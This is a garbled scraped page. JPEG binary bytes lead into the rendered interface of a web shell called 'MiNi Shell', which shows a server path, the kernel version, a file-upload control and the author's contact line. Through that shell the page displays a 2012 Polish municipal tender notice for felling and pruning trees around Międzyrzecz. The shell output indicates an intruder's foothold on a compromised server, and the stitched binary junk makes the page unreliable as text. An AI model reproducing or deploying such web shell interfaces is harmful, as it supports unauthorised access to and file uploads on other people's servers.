JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20121004/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20121004/211885-N-2012.html

<p class="kh_header"><b>Międzyrzecz: Wycinka i przycinka drzew na terenie gminy Międzyrzecz</b><br>
<b>Numer ogłoszenia: 211885 - 2012; data zamieszczenia: 04.10.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Międzyrzecz , ul. Rynek 1, 66-300 Międzyrzecz, woj. lubuskie, tel. 95 7426930, faks 95 7426979.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.miedzyrzecz.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wycinka i przycinka drzew na terenie gminy Międzyrzecz.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> I. Przedmiotem zamówienia jest wykonanie usługi wycinki i przycinki drzew na terenie gminy Międzyrzecz obejmującej:
1.Międzyrzecz, ul. Konstytucji 3 Maja (dz. nr 324/11) usunięcie 2 złamanych gałęzi wiszących na konarach w koronie drzewa z gatunku lipa - mapa nr 1;
2.Międzyrzecz, ul. Konstytucji 3 Maja (dz. nr 324/11) wycinka 1 szt. drzewa z gatunku lipa o obwodzie pni 220 cm wraz z frezowaniem korzenia - mapa nr 1;
3.Międzyrzecz, ul. Ogrodowa (dz. nr 359/3) wycinka 1 szt. drzewa z gatunku bez czarny o obwodzie pnia 43 cm wraz z frezowaniem korzenia - mapa nr 2;
4.Międzyrzecz, ul. Pamiątkowa (dz. nr 237/1) wycinka 2 szt. drzewa z gatunku jesion o obwodzie pni 160, 215 cm wraz z frezowaniem korzenia - mapa nr 3;
5.Międzyrzecz, ul. Podzamcze (dz. nr 382) wycinka 1 szt. drzewa z gatunku klon o obwodzie pnia 157 cm wraz z frezowaniem korzenia - mapa nr 4;
6.Międzyrzecz, ul. Staszica (dz. nr 226/1) wycinka 1 szt. drzewa z gatunku grab o obwodzie pnia 210 cm wraz z frezowaniem korzenia - mapa nr 5;
7.Międzyrzecz, ul. Stoczniowców Gdańskich - park (dz. nr 320/4) wycinka 1 szt. drzewa z gatunku jesion o obwodzie pnia 198 cm wraz z frezowaniem korzenia - mapa nr 5;
8.Międzyrzecz, ul. Szkolna (dz. nr 270) wycinka 1 szt. drzewa z gatunku wiąz o obwodzie pnia 183 cm wraz z frezowaniem korzenia - mapa nr 5;
9.Międzyrzecz, ul. 30-Stycznia (dz. nr 225) wycinka 3 szt. drzew w tym 2 szt. z gatunku lipa i 1 szt. z gatunku klon o obwodzie pni 132, 157, 237 cm wraz z frezowaniem korzeni - mapa nr 5;
10.Międzyrzecz, ul. Świerczewskiego (dz. nr 696) wycinka zakrzewień z powierzchni 2,5 m2 w pasie drogi gminnej - mapa nr 6;
11.Międzyrzecz, ul. Świerczewskiego (dz. nr 696) wycinka 1 szt. drzewa z gatunku topola o obwodzie pnia 194 cm wraz z frezowaniem korzenia - mapa nr 6;
12.Międzyrzecz, ul. Waszkiewicza (dz. nr 49/3) wycinka 3 szt. drzew z gatunku lipa o obwodzie pni 220, 230, 235 cm wraz z frezowaniem korzenia, wyrównaniem terenu i obsianiem go trawą - mapa nr 7, 8;
13.Bukowiec (dz. nr 535) wycinka 60 szt. drzewek z gatunku klon i jesion o obwodzie pni 3, 5x4, 10x6, 6x7, 6x12, 5x13, 14, 7x16, 17, 3x19, 8x22, 25, 28, 35, 31, 3x32 cm wraz z frezowaniem korzenia i wyrównaniem terenu po zakończonych pracach - mapa nr 9;
14.Bukowiec (dz. nr 535) przycinka zakrzewień z powierzchni 5 m2 w pasie drogi gminnej - mapa nr 9;
15.Kalsko (dz. nr 196) wycinka 2 szt. drzew z gatunku lipa o obwodzie pni 110, 98 cm wraz z frezowaniem korzenia - mapa nr 10;
16.Kalsko (dz. nr 106) wycinka 2 szt. drzew z gatunku topola o obwodzie pni 138, 195 cm wraz z frezowaniem korzenia - mapa nr 11;
17.Kalsko (dz. nr 112) wycinka 1 szt. drzew z gatunku wierzba o obwodzie pnia 350 cm wraz z frezowaniem korzenia - mapa nr 11;
18.Kaława (dz. nr 322/3) wycinka 1 szt. drzew z gatunku wierzba o obwodzie pnia 298 cm wraz z frezowaniem korzenia - mapa nr 12;
19.Kursko (dz. nr 421) wycinka 21 szt. drzew z gatunku klon o obwodzie pni 19, 20, 57, 24, 58, 8, 12, 20, 13, 46, 33, 40, 7, 30, 9, 64, 41, 58, 26, 55, 31 cm, 14 szt. drzew z gatunku sosna o obwodzie pni 120, 122, 75, 82, 117, 113, 118, 107, 100, 130, 148, 134, 94, 145 cm, 4 szt. drzew z gatunku lipa o obwodzie pnia 44, 20, 17, 31 i 1 szt. drzewa z gatunku jesion o obwodzie pnia  20 cm wraz z frezowaniem korzeni - mapa nr 13;
20.Kursko (dz. nr 400) wycinka 5 szt. drzew z gatunku topola o obwodzie pni 39, 42, 45, 52, 89 cm wraz z frezowaniem korzenia - mapa nr 14;
21.Kursko (dz. nr 410) przycinka zakrzewień z powierzchni 1350 m2 w pasie drogi gminnej -mapa nr 15;
22.Kursko (dz. nr 415) przycinka zakrzewień z powierzchni 2450 m2 w pasie drogi gminnej - mapa nr 15;
23.Szumiąca (dz. nr 234) wycinka 1 szt. drzew z gatunku wierzba o obwodzie pnia 186 cm wraz z frezowaniem korzenia - mapa nr 16;
24.Święty Wojciech (dz. nr 433/18) wycinka 31 szt. drzew z gatunku brzoza o obwodzie pni 14, 2x31, 29, 34, 36, 24, 2x16, 3x13, 2x9, 2x20, 2x7, 2x21, 19, 27, 11, 16, 10, 38, 28, 30, 17, 42, 46 cm wraz z karczowaniem korzenia i wyrównaniem terenu - mapa nr 17;
25.Wyszanowo (dz. nr 266) przycinka zakrzewień z powierzchni 408 m2 w pasie drogi gminnej - mapa nr 18;
26.Żółwin (dz. nr 186) wycinka 3 szt. drzew z gatunku jesion o obwodzie pni 25, 39, 55 cm wraz z frezowaniem korzenia - mapa nr 19;
27.Żółwin (dz. nr 186) przycinka zakrzewień z powierzchni 480 m2 w pasie drogi gminnej - mapa nr 19;

W pasie drogi powiatowej w Międzyrzeczu:
28.Międzyrzecz, ul. Konstytucji 3 Maja (dz. nr 323) przycinka pielęgnacyjna 22 szt. drzew z gatunku lipa o obwodach pni 148, 165, 167, 178, 174, 162, 188, 181, 182, 176, 187, 106, 140, 127, 163, 209, 163, 179, 172, 157, 177, 140 cm polegająca na usunięciu suchych i połamanych gałęzi w koronie drzew rosnących w pasie zieleni drogi powiatowej - mapa nr 20;

II. Zakres przedmiotu zamówienia obejmuje:  
1. Dokonanie uzgodnień:
a) z zarządcą dróg; 
b) organem zarządzającym ruchem; 
c) właścicielem sieci energetycznej;
jeżeli takie uzgodnienia w danym przypadku są wymagane;
2. Zabezpieczenie terenu prac (Wykonawca odpowiada za mienie znajdujące się w sąsiedztwie wycinanych i przycinanych drzew);
3. Wycinkę i przycinkę drzew z sukcesywnym uprzątnięciem gałęzi i przywracaniem terenu do stanu pierwotnego w terminie 24 godz. od rozpoczęcia na danym terenie prac;
4. Wywóz i pocięcie na odcinki 0,5 m pni drzew nadających się na opał i ich przewiezienie w miejsce wskazane przez Zamawiającego na terenie miasta Międzyrzecz;
5. Wywóz pozostałych gałęzi, ścinek, trocin na teren bazy przeładunkowej w Bukowcu, ZUOK w Długoszynie lub w inne miejsce zgodnie z ustawą o odpadach za okazaniem dowodu przyjęcia oraz uporządkowanie terenu.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 77.21.14.00-6.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 16.11.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający odstępuje od dokonania opisu sposobu oceny spełniania warunku w postępowaniu.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający dokona oceny za zasadzie spełnia - nie spełnia, na podstawie złożonego wykazu usług wykonanych w okresie ostatnich trzech lat, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, w przypadku świadczeń okresowych lub ciągłych również wykonywanych następujących usług: co najmniej jednej usługi obejmującej wycinkę i przycinkę drzew i krzewów o wartości 60 000 zł brutto z udokumentowaniem, że usługa ta została wykonana lub jest wykonywana należycie.
W przypadku, gdy Wykonawca wykazuje spełnienie powyższego warunku polegając na wiedzy i doświadczeniu innego podmiotu na zasadach określonych w art. 26 ust. 2b ustawy Prawo zamówień publicznych, warunek zostanie uznany przez Zamawiającego za spełniony, jeżeli zostanie wykazane uczestnictwo tego podmiotu w realizacji zamówienia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający dokona oceny za zasadzie spełnia - nie spełnia, na podstawie złożonego wykazu narzędzi i urządzeń technicznych dostępnych wykonawcy usług w celu realizacji zamówienia. Wykonawcy muszą dysponować minimum następującymi urządzeniami: łańcuchowa lub tarczowa piła spalinowa, platforma z balustradą na podnośniku samochodowym, piła ręczna do cięcia drewna, frezarka do pni.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający dokona oceny za zasadzie spełnia - nie spełnia, na podstawie złożonego wykazu osób, które będą uczestniczyć w wykonywaniu zamówienia, odpowiedzialnych za kierowanie pracami, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie dysponowania osobami. Wykonawca musi dysponować: 1) pracownikiem zatrudnionymi przy realizacji przedmiotu zamówienia, który posiada zaświadczenie o ukończeniu kursu pilarza najlepiej w zakresie cięć pielęgnacyjnych drzew; 
2) osobą kierującą robotami, która spełnia wymogi określone w § 23 ust. 2 rozporządzenia Ministra Kultury z dnia 27 lipca 2011r. w sprawie prowadzenia prac konserwatorskich, restauratorskich, robót budowlanych, badań konserwatorskich i architektonicznych, a także innych działań przy zabytku wpisanym do rejestru zabytków oraz badań archeologicznych i poszukiwań ukrytych lub porzuconych zabytków ruchomych (Dz. U. Nr 165, poz. 987).</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający odstępuje od dokonania opisu sposobu oceny spełniania warunku w postępowaniu.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>- pisemne zobowiązanie, o którym mowa w pkt 5.2. SIWZ, o ile Wykonawca polega na zasobach innych podmiotów na zasadach określonych w art. 26 ust. 2b ustawy pzp, - wypełniony formularz oferty wg załącznika nr 1 do SIWZ, - pełnomocnictwo lub inny dokument określający zakres umocowania do reprezentowania Wykonawcy, o ile ofertę składa pełnomocnik Wykonawcy</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Zmiany treści umowy wymagają dla swej ważności formy pisemnej w postaci aneksu akceptowanego przez obydwie strony.
2. Strony przewidują możliwość dokonania zmiany umowy w zakresie terminu wykonania umowy z powodu:
1) działania siły wyższej, w tym warunków atmosferycznych uniemożliwiających wykonanie przedmiotu zamówienia, 
2) działania osób trzecich, za które żadna ze stron nie ponosi odpowiedzialności; 
3) istotnego wydłużenia się procedury przetargowej.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.miedzyrzecz.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> www.bip.miedzyrzecz.pl.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 12.10.2012 godzina 09:00, miejsce: Urząd Miejski w Międzyrzeczu, Rynek 1, 66-300 Międzyrzecz, pok. 201 (sekretariat)..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com